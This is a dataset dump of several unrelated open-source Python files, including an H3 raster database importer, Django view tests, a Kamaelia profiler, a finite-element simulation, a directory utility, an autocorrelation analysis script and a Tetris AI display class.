indicator_id[0], h3_data_id[0]),\n )\n log.info(f\"Added material_indicator_to_h3 record for {column_name} of {dataset}\")\n\n\ndef update_for_indicator(cursor: psycopg.Cursor, dataset: str, column_name: str):\n cursor.execute('select id from \"indicator\" where \"nameCode\" = %s', (dataset,))\n indicator_id = cursor.fetchone()\n if not indicator_id:\n log.error(f\"Indicator with 'nameCode' {dataset} does not exists\")\n raise ValueError(f\"Indicator with 'nameCode' {dataset} does not exists\")\n\n cursor.execute('update h3_data set \"indicatorId\" = %s where \"h3columnName\" = %s', (indicator_id[0], column_name))\n log.info(f\"Updated indicatorId '{indicator_id[0]}' in h3_data for {column_name}\")\n\n\ndef update_for_material(cursor: psycopg.Cursor, dataset: str, column_name: str, data_type: str):\n select_query = sql.SQL('SELECT id FROM \"h3_data\" WHERE \"h3columnName\" = {}').format(sql.Literal(column_name))\n cursor.execute(select_query)\n h3_data_id = cursor.fetchone()\n if not h3_data_id:\n log.error(f\"Query result of {select_query.as_string(cursor)} returned nothing.\")\n raise ValueError(f\"h3_data with 'h3columnName' {column_name} does not exists\")\n # FIXME: the current solution for naming a material datasets is hard to follow and easy to mess up.\n dataset_id = dataset + \"_\" + snakify(column_name).split(\"_\")[-2]\n type_map = {\"harvest_area\": \"harvest\", \"production\": \"producer\"}\n delete_query = sql.SQL(\n 'DELETE FROM \"material_to_h3\" WHERE \"materialId\" = {material_id} AND \"type\" = {data_type}'\n ).format(\n material_id=sql.Placeholder(),\n data_type=sql.Literal(type_map[data_type]),\n )\n insert_query = sql.SQL(\n 'INSERT INTO \"material_to_h3\" (\"materialId\", \"h3DataId\", \"type\") '\n \"VALUES ({materialid}, {h3dataid}, {datatype})\"\n ).format(\n materialid=sql.Placeholder(),\n h3dataid=sql.Literal(h3_data_id[0]),\n datatype=sql.Literal(type_map[data_type]),\n )\n cursor.execute('SELECT id FROM \"material\" WHERE \"datasetId\" = %s', (dataset_id,))\n # cursor is going to be reused in the loop, so we need to fetch all the results before the loop\n material_ids = cursor.fetchall()\n for material_id in material_ids:\n cursor.execute(delete_query, (material_id[0],))\n cursor.execute(insert_query, (material_id[0],))\n log.info(f\"Updated materialId '{material_id[0]}' in material_to_h3 for {column_name}\")\n\n\ndef to_the_db(df: pd.DataFrame, table: str, data_type: str, dataset: str, year: int, h3_res: int):\n \"\"\"all the database insertion and manipulation happens here\n\n This way if we need to separate db stuff from actual data processing it can be done easily\n \"\"\"\n with psycopg.connect(get_connection_info()) as conn:\n create_h3_grid_table(conn, table, df)\n write_data_to_h3_grid_table(conn, table, df)\n clean_before_insert(conn, table)\n insert_to_h3_master_table(conn, table, df, h3_res, year, data_type, dataset)\n\n\n@click.command()\n@click.argument(\"folder\", type=click.Path(exists=True, path_type=Path))\n@click.argument(\"table\", type=str)\n@click.argument(\n \"data_type\",\n type=click.Choice([\"production\", \"harvest_area\", \"indicator\", \"material_indicator\"], case_sensitive=True),\n)\n@click.argument(\"dataset\", type=str)\n@click.argument(\"year\", type=int)\n@click.option(\"--h3-res\", \"h3_res\", type=int, default=6, help=\"h3 resolution to use [default=6]\")\n@click.option(\"--thread-count\", \"thread_count\", type=int, default=4, help=\"Number of threads to use [default=4]\")\ndef main(folder: Path, table: str, data_type: str, dataset: str, year: int, h3_res: int, thread_count: int):\n \"\"\"Reads a folder of .tif, converts to h3 and loads into a PG table\n\n \\b\n FOLDER is the path to the folder containing the raster files to be ingested.\n TABLE is the h3_grid_* style DB table name that will contain the actual H3 index and data.\n DATA_TYPE type of data being ingested.\n DATASET is the name of the reference in the indicator \"nameCode\" or material \"datasetID\".\n For the latter case it will be constructed dynamically using DATASET + filename.split(\"_\")[-2]\n YEAR is the last year of the dataset.\n \"\"\"\n # Part 1: Convert Raster to h3 index -> value map (or dataframe in this case)\n raster_files = list(folder.glob(\"*.tif\"))\n partial_raster_to_h3 = partial(raster_to_h3, raster_files[0], h3_res)\n with multiprocessing.Pool(thread_count) as pool:\n h3s = pool.map(partial_raster_to_h3, raster_files)\n log.info(f\"Joining H3 data of each raster into single dataframe for table {table}\")\n df = h3s[0]\n with click.progressbar(h3s[1:], label=\"Joining H3 dataframes\") as pbar:\n for h3df in pbar:\n df = df.join(h3df)\n del h3df\n\n # Part 2: Ingest h3 index into the database\n to_the_db(df, table, data_type, dataset, year, h3_res)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Vizzuality/landgriffon","sub_path":"data/h3_data_importer/raster_folder_to_h3_table.py","file_name":"raster_folder_to_h3_table.py","file_ext":"py","file_size_in_byte":11739,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"4617138898","text":"from django.core.urlresolvers import reverse\nfrom django.test import TestCase\n\nfrom pong.forms import GameForm\nfrom pong.models import Game, Point\nfrom tests.factories import PlayerFactory, GameFactory\n\n\nclass GameViewTests(TestCase):\n\n def setUp(self):\n self.player1 = PlayerFactory(name='Player 1')\n self.player2 = PlayerFactory(name='Player 2')\n\n def test_index(self):\n url = reverse('pong_index')\n\n response = self.client.get(url)\n\n self.assertEqual(response.status_code, 200)\n\n def test_game_create_get(self):\n url = reverse('pong_game_create')\n\n response = self.client.get(url)\n\n self.assertEqual(response.status_code, 200)\n self.assertIsInstance(response.context['form'], GameForm)\n\n def test_game_create_makes_new_game(self):\n url = reverse('pong_game_create')\n data = {\n 'player1': self.player1.pk,\n 'player2': self.player2.pk,\n }\n\n response = self.client.post(url, data)\n\n game = Game.objects.get()\n self.assertEqual(game.player1, self.player1)\n self.assertEqual(game.player2, self.player2)\n self.assertIsNone(game.winner)\n self.assertIsNone(game.loser)\n self.assertIsNotNone(game.date)\n\n def test_game_create_redirects_to_game_detail(self):\n url = reverse('pong_game_create')\n data = {\n 'player1': self.player1.pk,\n 'player2': self.player2.pk,\n }\n\n response = self.client.post(url, data)\n\n game = Game.objects.get()\n expected_url = reverse('pong_game_detail', args=[game.pk])\n self.assertRedirects(response, expected_url)\n\n def test_game_create_cannot_use_same_player_for_both(self):\n url = reverse('pong_game_create')\n data = {\n 'player1': self.player1.pk,\n 'player2': self.player1.pk,\n }\n\n response = self.client.post(url, data)\n\n self.assertEqual(response.status_code, 200)\n # No games were created\n self.assertFalse(Game.objects.exists())\n\n def test_game_detail_get(self):\n game = GameFactory()\n url = reverse('pong_game_detail', args=[game.pk])\n\n response = self.client.get(url)\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.context['game'], game)\n\n def test_add_point_post_adds_new_point_for_player_1(self):\n game = GameFactory()\n url = reverse('pong_add_point')\n data = {\n 'game_id': game.pk,\n 'player': '1',\n }\n\n response = self.client.post(url, data)\n\n self.assertEqual(Point.objects.count(), 1)\n point = Point.objects.get()\n self.assertEqual(point.game, game)\n self.assertEqual(point.player, game.player1)\n\n def test_add_point_post_adds_new_point_for_player_2(self):\n game = GameFactory()\n url = reverse('pong_add_point')\n data = {\n 'game_id': game.pk,\n 'player': '2',\n }\n\n response = self.client.post(url, data)\n\n self.assertEqual(Point.objects.count(), 1)\n point = Point.objects.get()\n self.assertEqual(point.game, game)\n self.assertEqual(point.player, game.player2)\n\n def test_add_point_post_400_error_if_player_not_1_or_2(self):\n game = GameFactory()\n url = reverse('pong_add_point')\n data = {\n 'game_id': game.pk,\n 'player': '3',\n }\n\n response = self.client.post(url, data)\n\n self.assertEqual(response.status_code, 400)\n","repo_name":"grantmcconnaughey/django-pong","sub_path":"tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6368285685","text":"from Axon.Component import component\nfrom Axon.ThreadedComponent import threadedcomponent\nfrom Axon.Ipc import producerFinished, shutdownMicroprocess\nfrom Kamaelia.Util.PipelineComponent import pipeline\nimport time\nfrom Axon.Scheduler import _ACTIVE\n\nclass Profiler(threadedcomponent):\n \"\"\"\\\n Profiler([samplingrate][,outputrate]) -> new Profiler component.\n\n Basic code profiler for Axon/Kamaelia systems. Measures the amount of time\n different microproceses are running.\n \n Keyword arguments:\n - samplingrate -- samples of state taken per second (default=1.0)\n - outputrate -- times statistics are output per second (default=1.0)\n \"\"\"\n Inboxes = { \"inbox\" : \"\",\n \"control\" : \"\",\n }\n Outboxes = { \"outbox\" : \"Raw profiling data\",\n \"signal\" : \"\",\n }\n\n def __init__(self, samplingrate=1.0, outputrate=1.0):\n super(Profiler,self).__init__()\n self.samplestep = 1.0 / samplingrate\n self.outputstep = 1.0 / outputrate\n\n def shutdown(self):\n while self.dataReady(\"control\"):\n msg = self.recv(\"control\")\n self.send(msg,\"signal\")\n if isinstance(msg, (shutdownMicroprocess, producerFinished)):\n return True\n return False\n\n def main(self):\n microprocesses = {}\n \n now = time.time()\n nextsample = now\n nextoutput = now\n cycles=0\n scheduler = self.scheduler\n latest=0\n \n while not self.shutdown():\n \n nexttime = min(nextsample,nextoutput)\n time.sleep(nexttime-now)\n \n now=time.time()\n if now >= nextsample:\n nextsample = now+self.samplestep\n cycles+=1\n latest+=1\n \n for mprocess in scheduler.listAllThreads():\n name=mprocess.name\n running,active,shortactive,_,_2 = microprocesses.get(name, (0,0,0,None,-1))\n running+=1\n# if not scheduler.isThreadPaused(mprocess):\n if scheduler.threads[mprocess] == _ACTIVE:\n active+=1\n shortactive+=1\n try:\n lineno = mprocess._microprocess__thread.gi_frame.f_locals['pc'].gi_frame.f_lineno\n except:\n lineno = -1\n microprocesses[name] = running,active,shortactive,latest,lineno\n \n if now >= nextoutput:\n nextoutput = now+self.outputstep\n \n outmsg = []\n# print \"-----Run----Active--%Usage--LineNo--Name-----------------\"\n todel=[]\n for name,(running,active,shortactive,mru,lineno) in microprocesses.iteritems():\n outmsg.append( { \"running\" : running,\n \"active\" : active,\n \"%usage\" : 100.0*shortactive/cycles,\n \"lineno\" : lineno,\n \"name\" : name,\n \"done\" : mru!=latest\n } )\n if mru!=latest:\n todel.append(name)\n name += \" [DONE]\"\n else:\n microprocesses[name] = (running,active,0,mru,lineno)\n# print \"%8d %8d %6.2f %6d %s\" % (running,active,100.0*shortactive/cycles,lineno,name)\n# print \"------------------------------------------\"\n cycles=0\n for name in todel:\n del microprocesses[name]\n self.send(outmsg, \"outbox\")\n \n\n\nclass ProfilerOutputFormatter(component):\n def shutdown(self):\n while self.dataReady(\"control\"):\n msg = self.recv(\"control\")\n self.send(msg,\"signal\")\n if isinstance(msg, (shutdownMicroprocess, producerFinished)):\n return True\n return False\n\n def main(self):\n while not self.shutdown():\n \n while self.dataReady(\"inbox\"):\n profile = self.recv(\"inbox\")\n output = \"-----Run----Active--%Usage--LineNo--Name-----------------\\n\"\n for mp in profile:\n flags = []\n if mp[\"done\"]:\n flags.append(\"[DONE]\")\n output += \"%8d %8d %6.2f %6d %s %s\\n\" % (mp[\"running\"],mp[\"active\"],mp[\"%usage\"],mp[\"lineno\"],mp[\"name\"],\" \".join(flags))\n output += \"---------------------------------------------------------\\n\"\n self.send(output,\"outbox\")\n \n yield 1\n self.pause() \n\ndef FormattedProfiler(*largs,**kargs):\n return pipeline( Profiler(*largs,**kargs), \n ProfilerOutputFormatter()\n )\n\nif __name__==\"__main__\":\n from Kamaelia.Util.Console import ConsoleEchoer\n\n class BusyComponent(component):\n def main(self):\n while 1:\n yield 1\n \n BusyComponent().activate()\n \n pipeline( FormattedProfiler(10.0,1.0),\n ConsoleEchoer(),\n ).run()\n ","repo_name":"sparkslabs/kamaelia_","sub_path":"Code/Python/Kamaelia/Kamaelia/Apps/MH/Profiling.py","file_name":"Profiling.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"30831441577","text":"from matplotlib import pyplot as plt\n\nfrom optimism.JaxConfig import *\nfrom optimism import EquationSolver as EqSolver\nfrom optimism import FunctionSpace\nfrom optimism import Interpolants\nfrom optimism.material import Neohookean as MatModel\nfrom optimism import Mechanics\nfrom optimism import Mesh\nfrom optimism.Mesh import EssentialBC\nfrom optimism.Mesh import DofManager\nfrom optimism import Objective\nfrom optimism import SparseMatrixAssembler\nfrom optimism import QuadratureRule\nfrom optimism.Timer import Timer\nfrom optimism import VTKWriter\nfrom optimism.test.MeshFixture import MeshFixture \n\n\nclass ContactArch(MeshFixture):\n\n def setUp(self):\n self.w = 0.07\n self.archRadius = 1.5\n self.ballRadius = self.archRadius/5.0\n self.initialBallLoc = self.archRadius + self.w + self.ballRadius\n N = 5\n M = 65\n \n mesh, _ = \\\n self.create_arch_mesh_disp_and_edges(N, M,\n self.w, self.archRadius, 0.5*self.w)\n mesh = Mesh.create_higher_order_mesh_from_simplex_mesh(mesh, order=2, copyNodeSets=False)\n nodeSets = Mesh.create_nodesets_from_sidesets(mesh)\n self.mesh = Mesh.mesh_with_nodesets(mesh, nodeSets)\n \n EBCs = [EssentialBC(nodeSet='left', field=0),\n EssentialBC(nodeSet='left', field=1),\n EssentialBC(nodeSet='right', field=0),\n EssentialBC(nodeSet='right', field=1),\n EssentialBC(nodeSet='push', field=1)]\n self.dofManager = DofManager(self.mesh, self.mesh.coords.shape, EBCs)\n\n quadRule = QuadratureRule.create_quadrature_rule_on_triangle(degree=2)\n self.fs = FunctionSpace.construct_function_space(self.mesh, quadRule)\n\n kappa = 10.0\n nu = 0.3\n E = 3*kappa*(1 - 2*nu)\n props = {'elastic modulus': E,\n 'poisson ratio': nu,\n 'version': 'coupled'}\n materialModel = MatModel.create_material_model_functions(props)\n\n self.bvpFuncs = Mechanics.create_mechanics_functions(self.fs,\n mode2D=\"plane strain\",\n materialModel=materialModel)\n\n def compute_energy_from_bcs(Uu, Ubc, internalVariables):\n U = self.dofManager.create_field(Uu, Ubc)\n return self.bvpFuncs.compute_strain_energy(U, internalVariables)\n \n self.compute_bc_reactions = jit(value_and_grad(compute_energy_from_bcs, 1))\n \n self.trSettings = EqSolver.get_settings()\n \n self.outputForce = []\n self.outputDisp = []\n self.outputEnergy = []\n\n\n def energy_function(self, Uu, p):\n U = self.create_field(Uu, p)\n internalVariables = p[1]\n return self.bvpFuncs.compute_strain_energy(U, internalVariables)\n\n \n def assemble_sparse(self, Uu, p):\n U = self.create_field(Uu, p)\n internalVariables = p[1]\n elementStiffnesses = self.bvpFuncs.compute_element_stiffnesses(U, internalVariables)\n return SparseMatrixAssembler.assemble_sparse_stiffness_matrix(elementStiffnesses,\n self.fs.mesh.conns,\n self.dofManager)\n\n\n def write_output(self, Uu, p, step):\n U = self.create_field(Uu, p)\n plotName = 'arch_bc-'+str(step).zfill(3)\n writer = VTKWriter.VTKWriter(self.mesh, baseFileName=plotName)\n \n writer.add_nodal_field(name='displacement', nodalData=U, fieldType=VTKWriter.VTKFieldType.VECTORS)\n\n bcs = np.array(self.dofManager.isBc, dtype=int)\n writer.add_nodal_field(name='bcs', nodalData=bcs, fieldType=VTKWriter.VTKFieldType.VECTORS, dataType=VTKWriter.VTKDataType.INT)\n\n Ubc = self.get_ubcs(p)\n internalVariables = p[1]\n energy, rxnBc = self.compute_bc_reactions(Uu, Ubc, internalVariables)\n reactions = ops.index_update(np.zeros(U.shape),\n ops.index[self.dofManager.isBc],\n rxnBc)\n writer.add_nodal_field(name='reactions', nodalData=reactions, fieldType=VTKWriter.VTKFieldType.VECTORS)\n\n energyDensities, stresses = self.bvpFuncs.\\\n compute_output_energy_densities_and_stresses(U, internalVariables)\n cellEnergyDensities = FunctionSpace.project_quadrature_field_to_element_field(self.fs, energyDensities)\n cellStresses = FunctionSpace.project_quadrature_field_to_element_field(self.fs, stresses)\n writer.add_cell_field(name='strain_energy_density',\n cellData=cellEnergyDensities,\n fieldType=VTKWriter.VTKFieldType.SCALARS)\n writer.add_cell_field(name='piola_stress',\n cellData=cellStresses,\n fieldType=VTKWriter.VTKFieldType.TENSORS)\n \n writer.write()\n\n self.outputForce.append(float(-np.sum(reactions[self.mesh.nodeSets['push'],1])))\n self.outputDisp.append(float(-p[0]))\n self.outputEnergy.append(float(energy))\n\n with open('arch_bc_Fd.npz','wb') as f:\n np.savez(f, force=np.array(self.outputForce),\n displacement=np.array(self.outputDisp),\n energy=np.array(self.outputEnergy))\n\n \n def get_ubcs(self, p):\n yLoc = p[0]\n V = np.zeros(self.mesh.coords.shape)\n index = ops.index[self.mesh.nodeSets['push'],1]\n V = ops.index_update(V, index, yLoc)\n return self.dofManager.get_bc_values(V)\n\n \n def create_field(self, Uu, p):\n return self.dofManager.create_field(Uu, self.get_ubcs(p))\n\n \n def run(self):\n Uu = self.dofManager.get_unknown_values(np.zeros(self.mesh.coords.shape))\n disp = 0.0\n ivs = self.bvpFuncs.compute_initial_state()\n p = Objective.Params(disp, ivs)\n\n precondStrategy = Objective.PrecondStrategy(self.assemble_sparse)\n objective = Objective.Objective(self.energy_function, Uu, p, precondStrategy)\n\n self.write_output(Uu, p, step=0)\n \n steps = 20\n maxDisp = 1.9*self.archRadius\n for i in range(1, steps):\n print('--------------------------------------')\n print('LOAD STEP ', i)\n\n disp -= maxDisp/steps\n p = Objective.param_index_update(p, 0, disp)\n Uu = EqSolver.nonlinear_equation_solve(objective,\n Uu,\n p,\n self.trSettings)\n \n self.write_output(Uu, p, i)\n\n \napp = ContactArch()\napp.setUp()\nwith Timer(name=\"AppRun\"):\n app.run()\n \n \n","repo_name":"btalami/optimism","sub_path":"examples/arch_bc/ArchBc.py","file_name":"ArchBc.py","file_ext":"py","file_size_in_byte":6924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"24789529416","text":"import os\nimport subprocess\n\nclass DirectoryTree:\n def __init__(self, relPath, base=os.getcwd()):\n if not type(relPath) is str:\n raise TypeError(\"relPath should be string\")\n if len(relPath) == 0:\n raise ValueError(\"relPath should not be empty string\")\n if \"\\\\\" in relPath:\n raise ValueError(\"Expect unix-style relPath argument\")\n self._lastPathComponent = relPath.split(\"/\")[-1]\n self._absPath = os.path.join(base, relPath)\n if not os.path.isdir(self._absPath):\n raise ValueError(\"Path is not a directory: \" + self._absPath)\n def getLastComponent(self):\n return self._lastPathComponent\n def getSubdirs(self):\n fileAndDirSet = set([])\n self._browsePaths(lambda p: fileAndDirSet.add(p.split(\"/\")[0]), [])\n subdirsSet = {item for item in fileAndDirSet if os.path.isdir(os.path.join(self._absPath, item))}\n subdirsSortedList = sorted(list(subdirsSet))\n return [DirectoryTree(item, self._absPath) for item in subdirsSortedList]\n\n def _browsePaths(self, handler, ignored):\n for dirname, _, filenames in os.walk(self._absPath):\n for filename in filenames:\n absPath = os.path.join(dirname, filename)\n relPath = os.path.relpath(absPath, self._absPath)\n relPath = relPath.replace(os.sep, \"/\")\n lastComponent = relPath.split(\"/\")[-1]\n if not lastComponent in ignored:\n handler(relPath)\n \n def browse(self, handler, ignored=[]):\n if ignored is None:\n ignored = []\n else:\n if not type(ignored) is list:\n raise TypeError(\"Not a list: \" + str(ignored))\n if not all([type(item) is str for item in str(ignored)]):\n raise TypeError(\"List should contain only strings: \" + str(ignored))\n self._browsePaths(lambda relPath: self._handleBrowsePath(relPath, handler), ignored)\n def _handleBrowsePath(self, relPath, handler):\n toOpen = os.path.join(self._absPath, relPath)\n with open(toOpen, \"r\") as f:\n rawLines = f.readlines()\n lines = [line.replace(\"\\r\\n\", \"\\n\").rstrip() for line in rawLines]\n handler(relPath, lines)\n def fileExists(self, path):\n return os.path.isfile(os.path.join(self._absPath, path))\n def openFile(self, path):\n return open(os.path.join(self._absPath, path))\n def getSubdirIfPresent(self, subdir):\n subdirsDict = {d.getLastComponent(): d for d in self.getSubdirs()}\n if subdir in subdirsDict:\n return subdirsDict[subdir]\n else:\n return None\n","repo_name":"ibissource/frank-manual","sub_path":"TutorialSteps/directoryTree.py","file_name":"directoryTree.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"16766814238","text":"import random\n\nfrom amrvac_tools.datfiles.reading import amrvac_reader\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nimport math\n\nfrom scipy import interpolate\nfrom scipy.optimize import curve_fit\nimport sys\n\n############################################\n# DEFINING NEEDED THINGS SO THE SCRIPT WORKS\n#############################################\n\nbf = 'WR_Isotropic_Calc1alpha_LTE_'\nTimestep_index = [30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54,\n 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79,\n 80, 71, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103,\n 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123,\n 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143,\n 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163,\n 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183,\n 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200]\n\n\n#####################################################\n# DENSITY AUTOCORRELATION LENGTH\n###############################################\n# Formula to use: fc(delta_y) = sum(t)sum(y) (rho(y) - average(rho))*(rho(y + delta_y) - average(rho))\n# Delta_y is the thing that has to be varied here\n# This for all r under 2.5 (index 307) and for all r above 2.5\n\nfn = bf + str(Timestep_index[0]).zfill(4) + '.dat'\nds = amrvac_reader.load_file(fn)\nad = ds.load_all_data()\nx, y = ds.get_coordinate_arrays()\nCombined_rho = ad['rho']\n\nfor index in range (1, len(Timestep_index)): # MAKING ONE BIG BOX OUT OF THE RESULTS STARTING FROM FILE 30\n fn = bf + str(Timestep_index[index]).zfill(4) + '.dat'\n ds = amrvac_reader.load_file(fn)\n ad = ds.load_all_data()\n x, y = ds.get_coordinate_arrays()\n rho = ad['rho']\n New_array = np.concatenate((Combined_rho, rho), axis=1)\n Combined_rho = New_array\n\n\nfc_delta_y = []\nx_as = []\nfor Delta_y in range (-20, 20, 1): # FOR A NUMBER OF DELTA_Y\n print(Delta_y)\n fc_altitude = 0\n x_as.append(Delta_y)\n for hoogte in range (100, 300,100): # UNDER 2.5: under 307\n fc_row = 0\n for ij in range (0 + abs(Delta_y) + 1, 128*len(Timestep_index) - abs(Delta_y) - 1): # SUMMATION OVER Y\n rho_average = Combined_rho.sum(axis=1) / (128 * len(Timestep_index))\n fc_lonely = ((Combined_rho[hoogte, ij] - rho_average[hoogte])* # Voor 1 ij\n (Combined_rho[hoogte, ij + Delta_y] - rho_average[hoogte]))\n fc_row = fc_row + fc_lonely # Dus alle resultaten per rij worden opgeteld\n fc_altitude = fc_altitude + fc_row # Per hoogte wordt het resultaat van een rij bijgeteld\n fc_delta_y.append(fc_altitude)\n\n# FULL WIDTH HALF MAXIMUM BEPALEN\n# Piek op delta_y = 0\nCenter = x_as.index(0)\nAverage_Height = 100000\nJump = 1\n\nwhile Average_Height > (fc_delta_y[Center]/2):\n Average_Height = (fc_delta_y[Center - Jump] + fc_delta_y[Center + Jump])/2\n Jump = Jump + 1\n print(Jump)\n\nJump = Jump - 1\nprint(Jump)\n\nFWHM = x_as[Center + Jump] - x_as[Center - Jump]\n\nprint('FWHM of fc curve = ',FWHM, 'cells')\nprint(Center)\nprint(Jump)\n\nplt.plot(x_as, fc_delta_y)\nplt.axvline(x = x_as[Center + Jump])\nplt.axvline(x = x_as[Center - Jump])\nplt.xlabel('Delta')\nplt.ylabel('fc')\nplt.savefig('fc_no_rot.png')\nplt.figure()\nplt.show()\n\n\n\nnp.savetxt(\"x_as_under_2_5_no_rot.txt\", x_as, delimiter=\",\")\nnp.savetxt(\"fc_delta_y_under_2_5_no_rot.txt\", fc_delta_y, delimiter=\",\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"LaraDelbroek/Research-Projects-In-Theoretical-AstroPhysics-Lara-Delbroek","sub_path":"fc.py","file_name":"fc.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70138315686","text":"# viewController.py\n\n\nimport pygame as gui\nimport numpy as np\nimport os\n\n\nclass ViewController( object ):\n\n rd = ( 249, 35, 56 )\n pk = ( 201, 115, 255 )\n bl = ( 28, 118, 188 )\n yw = ( 254, 227, 86 )\n gn = ( 83, 213, 4 )\n cy = ( 54, 224, 255 )\n og = ( 248, 147, 29 )\n dk = ( 39, 40, 33 )\n lg = ( 112, 108, 90 )\n colors = [ dk, rd, pk, bl, yw, gn, cy, og ]\n\n def __init__( self, grid, time, score, ai, grapher ):\n\n try:\n os.environ['SDL_VIDEO_WINDOW_POS'] = '10,50'\n except:\n pass\n self.grid = grid\n self.time = time\n self.score = score\n self.ai = ai\n self.grapher = grapher\n self.abort = False\n self.update = True\n self.infoMode = 0\n self.genomeScreen = [ 0, -1 ]\n self.aiState = False\n #gui.init( )\n self.screen = gui.display.set_mode( ( 820,720 ) )\n self.fontBold = gui.font.Font( 'font/texgyrecursor-bold.otf', 60 )\n self.fontRegular = gui.font.Font( 'font/texgyrecursor-regular.otf', 30 )\n self.fontSmall = gui.font.Font( 'font/texgyrecursor-regular.otf', 15 )\n self.updateStatic( True )\n\n def updateStatic( self, render=False ):\n if not render:\n self.screen.blit( self.static, ( 0, 0 ) )\n return\n static = gui.Surface( ( 840, 720 ) )\n static.set_colorkey( ( 0, 0, 0 ) )\n # background\n static.fill( self.dk )\n # draw seperator\n gui.draw.line(static, self.lg, ( 420, 0 ), ( 420, 720 ), 2 )\n gui.draw.line(static, self.lg, ( 420, 360 ), ( 840, 360 ), 2 )\n # draw grid lines\n for i in range( 10 ):\n gui.draw.line(static, self.lg, ( 30*i+60, 60 ), ( 30*i+60, 660 ) )\n gui.draw.line(static, self.lg, ( 60, 30*i+60 ), ( 360, 30*i+60 ), 1+2*(i==4) )\n gui.draw.line(static, self.lg, ( 60, 30*i+390 ), ( 360, 30*i+390 ) )\n gui.draw.line(static, self.lg, ( 360, 60 ), ( 360, 660 ) )\n gui.draw.line(static, self.lg, ( 60, 360 ), ( 360, 360 ) )\n # draw tile preview\n for i in range( 5 ):\n gui.draw.line(static, self.lg, ( 480, 30*i+180), ( 600, 30*i+180) )\n gui.draw.line(static, self.lg, ( 30*i+480, 180), ( 30*i+480, 300) )\n # draw headline\n label = self.fontBold.render( 'TetrisAI', 2, self.lg )\n size = self.fontBold.size( 'TetrisAI' )[ 0 ]\n static.blit( label, ( 615-size/2, 30 ) )\n # draw buttons\n gui.draw.rect( static, self.lg, gui.Rect( 480, 630, 101, 30 ), 1 )\n gui.draw.rect( static, self.lg, gui.Rect( 580, 630, 101, 30 ), 1 )\n gui.draw.rect( static, self.lg, gui.Rect( 680, 630, 101, 30 ), 1 )\n label = self.fontSmall.render( 'General', 2, self.lg )\n static.blit( label, ( 485, 630 ) )\n label = self.fontSmall.render( 'Genomes', 2, self.lg )\n static.blit( label, ( 585, 630 ) )\n label = self.fontSmall.render( 'Graph', 2, self.lg )\n static.blit( label, ( 685, 630 ) )\n # apply\n self.static = static\n\n def setUpdate( self, update ):\n self.update = update\n\n def setTile( self, cTile, nTile ):\n self.cTile = cTile\n self.nTile = nTile\n\n def updateGrid( self ):\n grid = self.grid.grid + self.cTile.render( )\n for x in range( 10 ):\n for y in range( 20 ):\n color = self.colors[ grid[ x, y ] ]\n gui.draw.rect( self.screen, color, gui.Rect( 30*x+65, 30*y+65, 21, 21 ), 0 )\n\n def updateGameScreen( self ):\n color = self.colors[ self.nTile.identifier ]\n preview = self.nTile.renderPreview( )\n for x in range( 4 ):\n for y in range( 4 ):\n if preview[ x, y ] != 0:\n gui.draw.rect( self.screen, color, gui.Rect( 30*x+485, 30*y+185, 21, 21 ), 0 )\n\n label = self.fontRegular.render( str( self.score.getScore( ) ), 2, self.lg )\n size = self.fontRegular.size( str( self.score.getScore( ) ) )[ 0 ]\n self.screen.blit( label, ( 780-size, 180 ) )\n\n label = self.fontRegular.render( str( self.score.getHighscore( ) ), 2, self.lg )\n size = self.fontRegular.size( str( self.score.getHighscore( ) ) )[ 0 ]\n self.screen.blit( label, ( 780-size, 240 ) )\n\n def updateGeneralScreen( self ):\n gui.draw.rect(self.screen, self.lg, gui.rect.Rect( 480, 420, 300, 10 ), 1 )\n self.progress = self.time.getIntvProgress( )\n gui.draw.rect( self.screen, self.lg, gui.rect.Rect( 480, 420, min( 300, 300*self.progress ), 10 ) )\n\n label = self.fontRegular.render( 'Speed', 2, self.lg )\n self.screen.blit( label, ( 480, 450 ) )\n label = self.fontRegular.render( str( self.time.getSpeed( ) )+'x', 2, self.lg )\n size = self.fontRegular.size( str( self.time.getSpeed( ) )+'x' )[ 0 ]\n self.screen.blit( label, ( 780-size, 450 ) )\n\n label = self.fontRegular.render( 'Generation', 2, self.lg )\n self.screen.blit( label, ( 480, 480 ) )\n label = self.fontRegular.render( str( self.ai.currentGeneration ), 2, self.lg )\n size = self.fontRegular.size( str( self.ai.currentGeneration ) )[ 0 ]\n self.screen.blit( label, ( 780-size, 480 ) )\n\n label = self.fontRegular.render( 'Genom', 2, self.lg )\n self.screen.blit( label, ( 480, 510 ) )\n label = self.fontRegular.render( str( self.ai.currentGenome ), 2, self.lg )\n size = self.fontRegular.size( str( self.ai.currentGenome ) )[ 0 ]\n self.screen.blit( label, ( 780-size, 510 ) )\n\n def 